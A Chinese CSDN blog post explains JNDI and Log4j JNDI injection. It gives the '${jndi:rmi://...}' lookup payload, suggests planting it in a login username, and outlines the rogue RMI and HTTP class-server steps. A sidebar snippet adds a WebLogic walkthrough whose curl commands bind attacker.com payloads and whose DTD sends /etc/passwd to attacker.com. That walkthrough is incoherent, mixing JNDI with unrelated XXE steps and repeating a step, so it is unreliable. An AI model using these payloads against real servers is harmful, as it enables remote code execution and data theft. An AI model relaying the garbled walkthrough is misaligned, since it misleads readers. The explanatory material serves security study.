JNDI以及利用JNDI进行漏洞攻击

已于 2024-01-30 14:48:33 修改
阅读量517 收藏 8
点赞数 12
文章标签: 服务器 安全 java
于 2024-01-30 14:43:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23947467/article/details/130593837
版权

什么是JNDI?

什么是JNDI?_jndi是什么_Cloud-Future的博客-CSDN博客

个人理解:

JNDI是java提供的命名和目录服务。

命名服务

命名服务是一种简单的键值对绑定,可以通过键名检索值,RMI就是典型的命名服务

目录服务

目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象,这么说可能不太好理解,我们举个例子:比如你要在某个学校里里找某个人,那么会通过:年级->班级->姓名这种方式来查找,年级、班级、姓名这些就是某个人的属性,这种层级关系就很像目录关系。

这个JNDI是j2ee时代的产物,现在都基于SpringBoot开发,很少用到这种技术,但由于是java本身自带的东西,导致在java环境中天生就带有这个东西。

JNDI的注入攻击

概念

RMI服务器:RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。

用于绑定名称和对象的关系。

JNDI Reference对象:该对象表示其本身在RMI服务器上不存在,需要进行远程下载。

注入攻击:通过log4j的指定版本,进行日志打印:log.info("${jndi:rmi://localhost:309/aa}")

这个时候,log4j会根据内容判断成需要使用jndi,接着去调用rmi指定的地址,这个rmi服务是我们自己定义的服务,并且aa对象是个Reference对象,这种对象代表请求的名称,在rmi服务器上不存在,需要去一个网站上下载该类,这个设置,可以启动rmi服务器的时候进行设置。并且下载的完成后会进行反序列化,并且这个过程是服务器上执行的,就导致了黑客可以注入任意的代码。

完成攻击有下面几个步骤:

1.想办法让被攻击的服务器上的程序,执行一次类似于这样的日志打印,

log.info("${jndi:rmi://localhost:309/aa}"),基于常识,我们可以在登录的用户名里面输入这个字符串,因为后台有的时候会打印用户名。

2.本地启动一个rmi服务,该rmi服务需要绑定一个Reference对象,并且指定Reference对象的下载地址。

3.启动一个http服务来提供下载服务,在该类中,可以进行恶意代码,必须在static和无参构造方法里面。

4.这个时候被攻击的服务器会下载该类,并进行类的反序列号,恶意代码即可被执行,这个过程是在服务端执行的,所以危害巨大。

具体的代码模拟过程:可以参考这个博客

JNDI注入 Reference + RMI 打开了rmi.object.trustURLCodebase还是失败-CSDN博客

Bowles-Liu
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
5-java安全基础——RMI和JNDI实现漏洞利用
网络安全
07-14 3607
JNDIJava Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。 关于什么是标识符?可参考RMI注册表,例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远
JNDI以及利用JNDI进行漏洞攻击_jndi+rmi解决漏洞
2401_84254364的博客
05-16 415
这个时候,log4j会根据内容判断成需要使用jndi,接着去调用rmi指定的地址,这个rmi服务是我们自己定义的服务,并且aa对象是个Reference对象,这种对象代表请求的名称,在rmi服务器上不存在,需要去一个网站上下载该类,这个设置,可以启动rmi服务器的时候进行设置。目录服务是命名服务的拓展。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。,就导致了黑客可以注入任意的代码。
安全攻击原理详解(四) -- JNDI
saodiseng_a的博客
12-23 3250
1. JNDI 1.1 JNDI基本概念 JNDIJava Naming and DIrecroty Interface),是java命名与目录接口,JNDI包括Naming Service和Directory Service,通过名称来寻找数据和对象的API,也称为一种绑定。JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 //web.xml <Environment name="jndiName" value="jndiValue" type=
JNDI Injection Memshell:利用JNDI注入的新一代攻击工具
gitblog_00072的博客
04-03 366
JNDI Injection Memshell:利用JNDI注入的新一代攻击工具 项目地址:https://gitcode.com/MUYU212/JNDI-Injection-Memshell 项目简介 JNDI Injection Memshell 是一个针对Java Naming and Directory Interface (JNDI) 注入漏洞的开源渗透测试工具。该项目旨在帮助安全研究...
WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出网
siu~
12-18 1270
知识点: 1、Java安全-RCE执行-5大类函数调用 2、Java安全-JNDI注入-RMI&LDAP&高版本 3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
JNDI注入详解
m0_60571990的博客
03-02 4022
JNDI注入详解
jndi-tool JNDI服务利用工具
01-06
"jndi-tool"是一个专门针对JNDI服务的利用工具,它可以被用来测试和利用JNDI相关的安全漏洞。此工具特别关注RMI和LDAP服务,这两种服务是JNDI常用的两种协议。RMI允许Java对象在不同的Java虚拟机之间进行远程调用,...
Spring framework deserialization RCE漏洞分析以及利用1
08-08
Spring框架的反序列化RCE漏洞分析与利用 在2021年初,Java反序列化漏洞引起广泛关注,研究人员不断探索其利用技巧。近期,安全研究员zero...保持系统更新、使用安全编程实践以及强化输入验证是防止这类漏洞的关键。
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
技术分析:Log4J JNDI 远程执行代码漏洞在云上环境中的独特影响
最新发布
白帽子凯哥哥的博客
06-17 800
攻击EC2实例元数据API并不新颖,云安全研究人员也一直在描述和介绍针对这种服务的滥用行为。这不是一个“新错误”,而是Log4J漏洞对云计算影响的新表述。虽然这篇文章专门针对针对AWS环境的威胁,但所有相同的原则在任何GCP或Azure环境中都适用。
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 8406
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
JNDI注入的一种新攻击面-CVE-2024-20931分析
A1_3_9_7的博客
03-22 560
当Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入。
安全研究所 - JNDI注入的一种新攻击面-CVE-2024-20931分析
A_991128a的博客
04-20 645
当Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。![图片](https://img-而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入。![图片](https://img-
JNDI注入漏洞的原理和复现
Locosomnus的博客
01-29 1616
一篇关于JNDI注入的学习笔记
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求,触发 JNDI 注入漏洞。例如,可以使用以下命令触发漏洞: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 XML 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 XML 文件: ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 DTD 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 DTD 文件: ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器攻击者控制的服务器发送 HTTP 请求,从而触发恶意代码的执行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值